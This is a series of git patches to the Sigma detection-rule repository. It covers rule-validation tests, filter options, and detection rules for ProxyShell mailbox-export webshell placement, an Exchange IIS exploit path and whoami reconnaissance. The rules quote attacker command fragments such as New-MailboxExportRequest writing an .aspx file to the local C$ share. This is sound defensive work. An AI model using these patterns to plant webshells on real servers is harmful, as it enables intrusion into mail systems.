+ valid_tlp = [ + "WHITE", + "GREEN", + "AMBER", + "RED", + ] + for file in self.yield_next_rule_file_path(self.path_to_rules): + tlp_str = self.get_rule_part(file_path=file, part_name="tlp") + if tlp_str: + # it exists but isn't a string + if not isinstance(tlp_str, str): + print(Fore.YELLOW + "Rule {} has a 'tlp' field that isn't a string.".format(file)) + faulty_rules.append(file) + elif not tlp_str.upper() in valid_tlp: + print(Fore.YELLOW + "Rule {} has a 'tlp' field with not valid value.".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed optional 'tlp' fields. (https://www.cisa.gov/tlp)") + + def test_optional_target(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + target = self.get_rule_part(file_path=file, part_name="target") + if target: + # it exists but isn't a list + if not isinstance(target, list): + print(Fore.YELLOW + "Rule {} has a 'target' field that isn't a list.".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed 'target' fields. (has to be a list of values even if it contains only a single value)") + def test_references(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): @@ -445,7 +480,7 @@ class TestRules(unittest.TestCase): filename = os.path.basename(file) if not filename_pattern.match(filename) and not '_' in filename: print(Fore.YELLOW + "Rule {} has a file name that doesn't match our standard.".format(file)) - faulty_rules.append(file) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed file names (too short, too long, uppercase letters, a minus sign etc.). Please see the file names used in our repository and adjust your file names accordingly. The pattern for a valid file name is '[a-z0-9_]{10,70}\.yml' and it has to contain at least an underline character.") @@ -495,7 +530,7 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with non-conform 'title' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#title") + "There are rules with non-conform 'title' fields. Please check: https://github.com/SimaHQ/sigma/wiki/Rule-Creation-Guide#title") def test_invalid_logsource_attributes(self): faulty_rules = [] @@ -514,32 +549,32 @@ class TestRules(unittest.TestCase): valide = False if not valid: faulty_rules.append(file) - + self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with non-conform 'logsource' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#log-source") - - def test_selection_list_one_value(self): - faulty_rules = [] - for file in self.yield_next_rule_file_path(self.path_to_rules): - detection = self.get_rule_part(file_path=file, part_name="detection") - if detection: - valid = True - for key in detection: - if isinstance(detection[key],list): - if len(detection[key]) == 1 and not isinstance(detection[key][0],str): #rule with only list of Keywords term - print(Fore.RED + "Rule {} has the selection ({}) with a list of only 1 value in detection".format(file, key)) - #valid = False - if isinstance(detection[key],dict): - for sub_key in detection[key]: - if isinstance(detection[key][sub_key],list): #split in 2 if as get a error "int has not len()" - if len(detection[key][sub_key]) == 1: - print (Fore.RED + "Rule {} has the selection ({}/{}) with a list of only 1 value in detection".format(file, key, sub_key)) - #valid = False - if not valid: - faulty_rules.append(file) - - self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using list with only 1 value") - + + #deactivate because more than 170 rules have been corrected + # def test_selection_list_one_value(self): + # faulty_rules = [] + # for file in self.yield_next_rule_file_path(self.path_to_rules): + # detection = self.get_rule_part(file_path=file, part_name="detection") + # if detection: + # valid = True + # for key in detection: + # if isinstance(detection[key],list): + # if len(detection[key]) == 1 and not isinstance(detection[key][0],str): #rule with only list of Keywords term + # print(Fore.RED + "Rule {} has the selection ({}) with a list of only 1 value in detection".format(file, key)) + # #valid = False + # if isinstance(detection[key],dict): + # for sub_key in detection[key]: + # if isinstance(detection[key][sub_key],list): #split in 2 if as get a error "int has not len()" + # if len(detection[key][sub_key]) == 1: + # print (Fore.RED + "Rule {} has the selection ({}/{}) with a list of only 1 value in detection".format(file, key, sub_key)) + # #valid = False + # if not valid: + # faulty_rules.append(file) + # + # self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using list with only 1 value") def get_mitre_data(): """ diff --git a/tools/sigma/filter.py b/tools/sigma/filter.py index f3bc6feb..175f1284 100644 --- a/tools/sigma/filter.py +++ b/tools/sigma/filter.py @@ -30,6 +30,8 @@ class SigmaRuleFilter: self.minlevel = None self.maxlevel = None self.status = None + self.tlp = None + self.target = None self.logsources = list() self.notlogsources = list() self.tags = list() @@ -62,6 +64,10 @@ class SigmaRuleFilter: self.status = cond[cond.index("=") + 1:] if self.status not in self.STATES: raise SigmaRuleFilterParseException("Unknown status '%s' in condition '%s'" % (self.status, cond)) + elif cond.startswith("tlp="): + self.tlp = cond[cond.index("=") + 1:].upper() #tlp is allways uppercase + elif cond.startswith("target="): + self.target = cond[cond.index("=") + 1:].lower() # lower to make caseinsensitive elif cond.startswith("logsource="): self.logsources.append(cond[cond.index("=") + 1:]) elif cond.startswith("logsource!="): @@ -110,6 +116,24 @@ class SigmaRuleFilter: if status != self.status: return False + # Tlp + if self.tlp is not None: + try: + tlp = yamldoc['tlp'] + except KeyError: # missing tlp + tlp = "WHITE" # tlp is WHITE by default + if tlp != self.tlp: + return False + + #Target + if self.target: + try: + targets = [ target.lower() for target in yamldoc['target']] + except (KeyError, AttributeError): # no target set + return False + if self.target not in targets: + return False + # Log Sources if self.logsources: try: From 32fc1911636778530d3c86cc6240b63dc5cf3251 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 11 Aug 2021 15:09:53 +0200 Subject: [PATCH 0299/1367] fix cs-uri-query and cs-uri-stem --- rules/web/web_cve_2021_26858_iis_rce.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/web/web_cve_2021_26858_iis_rce.yml b/rules/web/web_cve_2021_26858_iis_rce.yml index eaddf371..d630eafe 100644 --- a/rules/web/web_cve_2021_26858_iis_rce.yml +++ b/rules/web/web_cve_2021_26858_iis_rce.yml @@ -14,8 +14,8 @@ detection: selection: cs-method: 'POST' sc-status: 200 - cs-uri-stem|startswith: '/ecp/DDI/DDIService.svc/SetObject' - cs-uri-stem|contains|all: + cs-uri-stem: '/ecp/DDI/DDIService.svc/SetObject' + cs-uri-query|contains|all: - 'schema=Reset' - 'VirtualDirectory' cs-username|endswith: '$' From 1c919c07c77fccd8999825735ec2fe878122d4bf Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 11 Aug 2021 16:38:44 +0200 Subject: [PATCH 0300/1367] exchange mailbox export with generic keyword search (Message is not a real field) --- ...win_exchange_proxyshell_mailbox_export.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/windows/other/win_exchange_proxyshell_mailbox_export.yml diff --git a/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml b/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml new file mode 100644 index 00000000..c14cd44e --- /dev/null +++ b/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml @@ -0,0 +1,30 @@ +title: Mailbox Export to Exchange Webserver +id: 60685ef9-ad8b-4dba-af27-841a2a25489c +status: experimental +description: Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it +references: + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html +author: Christian Burkard +date: 2021/08/10 +logsource: + service: msexchange-management + product: windows +detection: + export_command: + - 'New-MailboxExportRequest' + - ' -Mailbox ' + export_params: + - '-FilePath "\\localhost\C$' + - '-FilePath "\\127.0.0.1\C$' + - '.aspx' + role_assignment: + - 'New-ManagementRoleAssignment' + - ' -Role "Mailbox Import Export"' + - ' -User ' + condition: (all of export_command and export_params) or role_assignment +falsepositives: + - unlikely +level: critical +tags: + - attack.persistence + - attack.t1505.003 From a880663d51998f89cdbffc95ce00fe49d5d27397 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 11 Aug 2021 17:46:10 +0200 Subject: [PATCH 0301/1367] fix: add missing 'all of' for 'and' conjunction of the assignment keywords --- rules/windows/other/win_exchange_proxyshell_mailbox_export.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml b/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml index c14cd44e..886f7318 100644 --- a/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml +++ b/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml @@ -21,7 +21,7 @@ detection: - 'New-ManagementRoleAssignment' - ' -Role "Mailbox Import Export"' - ' -User ' - condition: (all of export_command and export_params) or role_assignment + condition: (all of export_command and export_params) or all of role_assignment falsepositives: - unlikely level: critical From 4aec212e08566212d5310f13491cc2ed68985f63 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 11 Aug 2021 11:24:15 -0500 Subject: [PATCH 0302/1367] Update gcp_kubernetes_rolebinding.yml --- rules/cloud/gcp_kubernetes_rolebinding.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp_kubernetes_rolebinding.yml b/rules/cloud/gcp_kubernetes_rolebinding.yml index c6da9214..3059bced 100644 --- a/rules/cloud/gcp_kubernetes_rolebinding.yml +++ b/rules/cloud/gcp_kubernetes_rolebinding.yml @@ -14,7 +14,7 @@ logsource: service: gcp.audit detection: selection: - eventName: + gcp.audit.method_name: - io.k8s.authorization.rbac.v*.clusterrolebindings.create - io.k8s.authorization.rbac.v*.rolebindings.create - io.k8s.authorization.rbac.v*.clusterrolebindings.patch From 9b9d3c28c787952ea29389cd23c85e6ce439ced5 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 11 Aug 2021 11:24:40 -0500 Subject: [PATCH 0303/1367] Update gcp_kubernetes_secrets_modified_or_deleted.yml --- rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml index 8b78f993..ba63cc98 100644 --- a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml +++ b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml @@ -10,7 +10,7 @@ logsource: service: gcp.audit detection: selection: - eventName: + gcp.audit.method_name: - io.k8s.core.v*.secrets.create - io.k8s.core.v*.secrets.update - io.k8s.core.v*.secrets.patch From ae85bf2b28873009ebf0dec4183a6248d19485d4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 11 Aug 2021 11:26:14 -0500 Subject: [PATCH 0304/1367] Update gcp_kubernetes_rolebinding.yml --- rules/cloud/gcp_kubernetes_rolebinding.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp_kubernetes_rolebinding.yml b/rules/cloud/gcp_kubernetes_rolebinding.yml index 3059bced..b3c148c5 100644 --- a/rules/cloud/gcp_kubernetes_rolebinding.yml +++ b/rules/cloud/gcp_kubernetes_rolebinding.yml @@ -1,7 +1,7 @@ title: Google Cloud Kubernetes RoleBinding id: 2f0bae2d-bf20-4465-be86-1311addebaa3 description: Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/09 references: From 22d672187c78f50d64191cc7787293b66d8bdeae Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 11 Aug 2021 11:26:32 -0500 Subject: [PATCH 0305/1367] Update gcp_kubernetes_secrets_modified_or_deleted.yml --- rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml index ba63cc98..c2bf97bf 100644 --- a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml +++ b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Google Cloud Kubernetes Secrets Modified or Deleted id: 2f0bae2d-bf20-4465-be86-1311addebaa3 description: Identifies when the Secrets are Modified or Deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/09 references: From 7ba375dea07cea8d3135282bc2837563c91420d6 Mon Sep 17 00:00:00 2001 From: Wietze Date: Wed, 11 Aug 2021 18:00:09 +0100 Subject: [PATCH 0306/1367] Optimising lists/subexpressions with length 1 Should reduce brackets on some output targets --- tools/sigma/backends/base.py | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index e9901e06..08d29b4b 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py @@ -277,6 +277,9 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): def generateSubexpressionNode(self, node): generated = self.generateNode(node.items) + if len(node.items) == 1: + # A sub expression with length 1 is not a proper sub expression, no self.subExpression required + return generated if generated: return self.subExpression % generated else: @@ -285,7 +288,11 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): def generateListNode(self, node): if not set([type(value) for value in node]).issubset({str, int}): raise TypeError("List values must be strings or numbers") - return self.listExpression % (self.listSeparator.join([self.generateNode(value) for value in node])) + result = [self.generateNode(value) for value in node] + if len(result) == 1: + # A list with length 1 is not a proper list, no self.listExpression required + return result[0] + return self.listExpression % (self.listSeparator.join(result)) def generateMapItemNode(self, node): fieldname, value = node From b144523ad2023bc6ef3a207430524ce0dd2bea32 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 11 Aug 2021 22:37:01 +0200 Subject: [PATCH 0307/1367] fix duplicate id --- rules/cloud/gcp_kubernetes_rolebinding.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp_kubernetes_rolebinding.yml b/rules/cloud/gcp_kubernetes_rolebinding.yml index b3c148c5..58eaad19 100644 --- a/rules/cloud/gcp_kubernetes_rolebinding.yml +++ b/rules/cloud/gcp_kubernetes_rolebinding.yml @@ -1,5 +1,5 @@ title: Google Cloud Kubernetes RoleBinding -id: 2f0bae2d-bf20-4465-be86-1311addebaa3 +id: 0322d9f2-289a-47c2-b5e1-b63c90901a3e description: Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding. author: Austin Songer @austinsonger status: experimental From 08883c8e3277667ccdba5ff1a2d6648520577bc1 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 12 Aug 2021 09:27:50 +0200 Subject: [PATCH 0308/1367] refactor: removed old rule that uses Message field Rules that use the "Message" field are prone to localisation issues and should be avoided whenever possible. We can build what we call "keyword" rules in these cases and simply combine string values that are searched in the raw data as 1 of them or all of them. (see specs for details) --- ...win_exchange_proxyshell_mailbox_export.yml | 7 +++-- .../win_exchange_proxyshell_mailboxexport.yml | 30 ------------------- 2 files changed, 4 insertions(+), 33 deletions(-) delete mode 100644 rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml diff --git a/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml b/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml index 886f7318..a16911e3 100644 --- a/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml +++ b/rules/windows/other/win_exchange_proxyshell_mailbox_export.yml @@ -1,11 +1,12 @@ title: Mailbox Export to Exchange Webserver -id: 60685ef9-ad8b-4dba-af27-841a2a25489c +id: 516376b4-05cd-4122-bae0-ad7641c38d48 status: experimental description: Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it references: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html -author: Christian Burkard -date: 2021/08/10 +author: Florian Roth, Rich Warren, Christian Burkard +date: 2021/08/09 +modified: 2021/08/11 logsource: service: msexchange-management product: windows diff --git a/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml b/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml deleted file mode 100644 index 335ad125..00000000 --- a/rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml +++ /dev/null @@ -1,30 +0,0 @@ -title: ProxyShell MSExchange MailBox Export Pattern -id: 516376b4-05cd-4122-bae0-ad7641c38d48 -status: experimental -description: Detects specific patterns found after a successful ProxyShell exploitation in relation to a Commandlet invokation of New-MailboxExportRequest -references: - - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html?m=1 -author: Florian Roth, Rich Warren -date: 2021/08/09 -logsource: - product: windows - service: msexchange-management -detection: - selection_cmdlet: - Message|contains|all: - - 'New-MailboxExportRequest' - - ' -Mailbox ' - selection_params: - Message|contains: - - '-FilePath "\\localhost\C$' - - '-FilePath "\\127.0.0.1\C$' - - '.aspx' - selection_assignment: - Message|contains|all: - - 'New-ManagementRoleAssignment' - - ' -Role "Mailbox Import Export"' - - ' -User "exchange.admin"' - condition: selection_cmdlet and selection_params or selection_assignment -falsepositives: - - Unlikely -level: critical \ No newline at end of file From 852d7a8b228f712c399bfae47ae79949621aad63 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 12 Aug 2021 10:11:17 +0200 Subject: [PATCH 0309/1367] fix: typo in description --- rules/web/web_exchange_proxyshell.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_exchange_proxyshell.yml b/rules/web/web_exchange_proxyshell.yml index e9017771..97c00b76 100644 --- a/rules/web/web_exchange_proxyshell.yml +++ b/rules/web/web_exchange_proxyshell.yml @@ -1,7 +1,7 @@ title: Exchange ProxyShell Pattern id: 23eee45e-933b-49f9-ae1b-df706d2d52ef status: experimental -description: Detects URP patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful) +description: Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful) references: - https://youtu.be/5mqid-7zp8k?t=2231 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html From bd0a2a1b9fc2e6bb9eba75df0b3684e9d31d9fa8 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 12 Aug 2021 13:27:51 +0200 Subject: [PATCH 0310/1367] rule: renamed whoami --- .../process_creation/win_renamed_whoami.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/windows/process_creation/win_renamed_whoami.yml diff --git a/rules/windows/process_creation/win_renamed_whoami.yml b/rules/windows/process_creation/win_renamed_whoami.yml new file mode 100644 index 00000000..25cd21fc --- /dev/null +++ b/rules/windows/process_creation/win_renamed_whoami.yml @@ -0,0 +1,25 @@ +title: Renamed Whoami Execution +id: f1086bf7-a0c4-4a37-9102-01e573caf4a0 +status: experimental +description: Detects the execution of whoami that has been renamed to a different name to avoid detection +references: + - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ + - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ +author: Florian Roth +date: 2021/08/12 +tags: + - attack.discovery + - attack.t1033 + - car.2016-03-001 +logsource: + category: process_creation + product: windows +detection: + selection: + OriginalFileName: 'whoami.exe' + filter: + Image|endswith: '\whoami.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: critical From 34d70de084df553ebb76f863eea0f65a566d7821 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 12 Aug 2021 13:28:00 +0200 Subject: [PATCH 0311/1367] rule: whoami anomalies --- .../win_susp_whoami_anomaly.yml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 rules/windows/process_creation/win_susp_whoami_anomaly.yml diff --git a/rules/windows/process_creation/win_susp_whoami_anomaly.yml b/rules/windows/process_creation/win_susp_whoami_anomaly.yml new file mode 100644 index 00000000..62184377 --- /dev/null +++ b/rules/windows/process_creation/win_susp_whoami_anomaly.yml @@ -0,0 +1,35 @@ +title: Whoami Execution Anomaly +id: 8de1cbe8-d6f5-496d-8237-5f44a721c7a0 +status: experimental +description: Detects the execution of whoami with suspicious parents or parameters +references: + - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ + - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ +author: Florian Roth +date: 2021/08/12 +tags: + - attack.discovery + - attack.t1033 + - car.2016-03-001 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\whoami.exe' + filter: + ParentImage|endswith: + - '\cmd.exe' + - '\powershell.exe' + selection_special: + CommandLine|contains: + - 'whoami -all' + - 'whoami /all' + - 'whoami.exe -all' + - 'whoami.exe /all' + condition: ( selection and not filter ) or selection_special +falsepositives: + - Admin activity + - Scripts and administrative tools used in the monitored environment + - Monitoring activity +level: high From d9d543e545bec517a2cd9b24b99d542e077b92ee Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 12 Aug 2021 13:28:24 +0200 Subject: [PATCH 0312/1367] refactor: removed OriginalFileName from rule to improve compatibilty --- rules/windows/process_creation/win_susp_whoami.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/windows/process_creation/win_susp_whoami.yml b/rules/windows/process_creation/win_susp_whoami.yml index 5fab95fa..ffc7efca 100644 --- a/rules/windows/process_creation/win_susp_whoami.yml +++ b/rules/windows/process_creation/win_susp_whoami.yml @@ -17,9 +17,7 @@ logsource: detection: selection: Image|endswith: '\whoami.exe' - selection2: - OriginalFileName: 'whoami.exe' - condition: selection or selection2 + condition: selection falsepositives: - Admin activity - Scripts and administrative tools used in the monitored environment From c165783fffd8814f18616c76ec48878726d19188 Mon Sep 17 00:00:00 2001 From: wagga40 <6437862+wagga40@users.noreply.github.com> Date: Thu, 12 Aug 2021 15:26:46 +0200 Subject: [PATCH 0313/1367] Add an option to enhance default output by choosing fields Add an option to output in JSON or YAML --- Pipfile | 1 + Pipfile.lock | 265 +++++++++++++++++++++++++++--------------- tools/sigma/sigmac.py | 61 ++++++++-- 3 files changed, 225 insertions(+), 102 deletions(-) diff --git a/Pipfile b/Pipfile index 060d74e8..718c305f 100644 --- a/Pipfile +++ b/Pipfile @@ -20,6 +20,7 @@ urllib3 = "~=1.26" progressbar2 = "~=3.47" pymisp = "~=2.4.123" PyYAML = "~=5.1" +"ruamel.yaml" = "*" [requires] python_version = "3.8" diff --git a/Pipfile.lock b/Pipfile.lock index f83fca95..2416e325 100644 --- a/Pipfile.lock +++ b/Pipfile.lock @@ -1,7 +1,7 @@ { "_meta": { "hash": { - "sha256": "9d6e50bfd41bb3de5ebbae350555fe4b67c24e2c186aac053905a7740a69e8b2" + "sha256": "08bbbed72c177a3a7a43aff79af8fdde3a0ac42e15d7e112d64cac2c5d5b6e68" }, "pipfile-spec": 6, "requires": { @@ -21,6 +21,7 @@ "sha256:149e90d6d8ac20db7a955ad60cf0e6881a3f20d37096140088356da6c716b0b1", "sha256:ef6aaac3ca6cd92904cdd0d83f629a15f18053ec84e6432106f7a4d04ae4f5fb" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", "version": "==21.2.0" }, "certifi": { @@ -30,26 +31,29 @@ ], "version": "==2021.5.30" }, - "chardet": { + "charset-normalizer": { "hashes": [ - "sha256:0d6f53a15db4120f2b08c94f11e7d93d2c911ee118b6b30a04ec3ee8310179fa", - "sha256:f864054d66fd9118f2e67044ac8981a54775ec5b67aed0441892edb553d21da5" + "sha256:0c8911edd15d19223366a194a513099a302055a962bca2cec0f54b8b63175d8b", + "sha256:f23667ebe1084be45f6ae0538e4a5a865206544097e4e8bbcacf42cd02a348f3" ], - "version": "==4.0.0" + "markers": "python_version >= '3'", + "version": "==2.0.4" }, "deprecated": { "hashes": [ "sha256:08452d69b6b5bc66e8330adde0a4f8642e969b9e1702904d137eeb29c8ffc771", "sha256:6d2de2de7931a968874481ef30208fd4e08da39177d61d3d4ebdf4366e7dbca1" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==1.2.12" }, "idna": { "hashes": [ - "sha256:b307872f855b18632ce0c21c5e45be78c0ea7ae4c15c828c20788b26921eb3f6", - "sha256:b97d804b1e9b523befed77c48dacec60e6dcb0b5391d57af6a65a312a90648c0" + "sha256:14475042e284991034cb48e06f6851428fb14c4dc953acd9be9a5e95c7b6dd7a", + "sha256:467fbad99067910785144ce333826c71fb0e63a425657295239737f7ecd125f3" ], - "version": "==2.10" + "markers": "python_version >= '3'", + "version": "==3.2" }, "jsonschema": { "hashes": [ @@ -68,24 +72,46 @@ }, "pymisp": { "hashes": [ - "sha256:7ab159ba589f54d105c59cb990722369c57d8f587b5df215a79ed4059cb57b8a", - "sha256:c6496a6884fe3a671e9dd3c314564b4e94b8827845f5ea0004ab3649373e9db2" + "sha256:5971eba9a4d3b7f5ee47035417c7692fc0ec45d581afcaa63e3f7e2d6a400923", + "sha256:641e3db1af1010cff3a652df6eb51ac4f4e540b1801b811d5e009c59114bf26a" ], "index": "pypi", - "version": "==2.4.141.1" + "version": "==2.4.148" }, "pyrsistent": { "hashes": [ - "sha256:2e636185d9eb976a18a8a8e96efce62f2905fea90041958d8cc2a189756ebf3e" + "sha256:097b96f129dd36a8c9e33594e7ebb151b1515eb52cceb08474c10a5479e799f2", + "sha256:2aaf19dc8ce517a8653746d98e962ef480ff34b6bc563fc067be6401ffb457c7", + "sha256:404e1f1d254d314d55adb8d87f4f465c8693d6f902f67eb6ef5b4526dc58e6ea", + "sha256:48578680353f41dca1ca3dc48629fb77dfc745128b56fc01096b2530c13fd426", + "sha256:4916c10896721e472ee12c95cdc2891ce5890898d2f9907b1b4ae0f53588b710", + "sha256:527be2bfa8dc80f6f8ddd65242ba476a6c4fb4e3aedbf281dfbac1b1ed4165b1", + "sha256:58a70d93fb79dc585b21f9d72487b929a6fe58da0754fa4cb9f279bb92369396", + "sha256:5e4395bbf841693eaebaa5bb5c8f5cdbb1d139e07c975c682ec4e4f8126e03d2", + "sha256:6b5eed00e597b5b5773b4ca30bd48a5774ef1e96f2a45d105db5b4ebb4bca680", + "sha256:73ff61b1411e3fb0ba144b8f08d6749749775fe89688093e1efef9839d2dcc35", + "sha256:772e94c2c6864f2cd2ffbe58bb3bdefbe2a32afa0acb1a77e472aac831f83427", + "sha256:773c781216f8c2900b42a7b638d5b517bb134ae1acbebe4d1e8f1f41ea60eb4b", + "sha256:a0c772d791c38bbc77be659af29bb14c38ced151433592e326361610250c605b", + "sha256:b29b869cf58412ca5738d23691e96d8aff535e17390128a1a52717c9a109da4f", + "sha256:c1a9ff320fa699337e05edcaae79ef8c2880b52720bc031b219e5b5008ebbdef", + "sha256:cd3caef37a415fd0dae6148a1b6957a8c5f275a62cca02e18474608cb263640c", + "sha256:d5ec194c9c573aafaceebf05fc400656722793dac57f254cd4741f3c27ae57b4", + "sha256:da6e5e818d18459fa46fac0a4a4e543507fe1110e808101277c5a2b5bab0cd2d", + "sha256:e79d94ca58fcafef6395f6352383fa1a76922268fa02caa2272fff501c2fdc78", + "sha256:f3ef98d7b76da5eb19c37fda834d50262ff9167c65658d1d8f974d2e4d90676b", + "sha256:f4c8cabb46ff8e5d61f56a037974228e978f26bfefce4f61a4b1ac0ba7a2ab72" ], - "version": "==0.17.3" + "markers": "python_version >= '3.6'", + "version": "==0.18.0" }, "python-dateutil": { "hashes": [ - "sha256:73ebfe9dbf22e832286dafa60473e4cd239f8592f699aa5adaf10050e6e1823c", - "sha256:75bb3f31ea686f1197762692a9ee6a7550b59fc6ca3a1f4b5d7e32fb98e2da2a" + "sha256:0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86", + "sha256:961d03dc3453ebbc59dbdea9e4e11c5651520a876d0f4db161e8674aae935da9" ], - "version": "==2.8.1" + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==2.8.2" }, "python-utils": { "hashes": [ @@ -131,26 +157,62 @@ }, "requests": { "hashes": [ - "sha256:27973dd4a904a4f13b263a19c866c13b92a39ed1c964655f025f3f8d3d75b804", - "sha256:c210084e36a42ae6b9219e00e48287def368a26d03a048ddad7bfee44f75871e" + "sha256:6c1246513ecd5ecd4528a0906f910e8f0f9c6b8ec72030dc9fd154dc1a6efd24", + "sha256:b8aa58f8cf793ffd8782d3d8cb19e66ef36f7aba4353eec859e74678b01b07a7" ], "index": "pypi", - "version": "==2.25.1" + "version": "==2.26.0" + }, + "ruamel.yaml": { + "hashes": [ + "sha256:106bc8d6dc6a0ff7c9196a47570432036f41d556b779c6b4e618085f57e39e67", + "sha256:ffb9b703853e9e8b7861606dfdab1026cf02505bade0653d1880f4b2db47f815" + ], + "index": "pypi", + "version": "==0.17.10" + }, + "ruamel.yaml.clib": { + "hashes": [ + "sha256:0847201b767447fc33b9c235780d3aa90357d20dd6108b92be544427bea197dd", + "sha256:1866cf2c284a03b9524a5cc00daca56d80057c5ce3cdc86a52020f4c720856f0", + "sha256:31ea73e564a7b5fbbe8188ab8b334393e06d997914a4e184975348f204790277", + "sha256:3fb9575a5acd13031c57a62cc7823e5d2ff8bc3835ba4d94b921b4e6ee664104", + "sha256:4ff604ce439abb20794f05613c374759ce10e3595d1867764dd1ae675b85acbd", + "sha256:72a2b8b2ff0a627496aad76f37a652bcef400fd861721744201ef1b45199ab78", + "sha256:78988ed190206672da0f5d50c61afef8f67daa718d614377dcd5e3ed85ab4a99", + 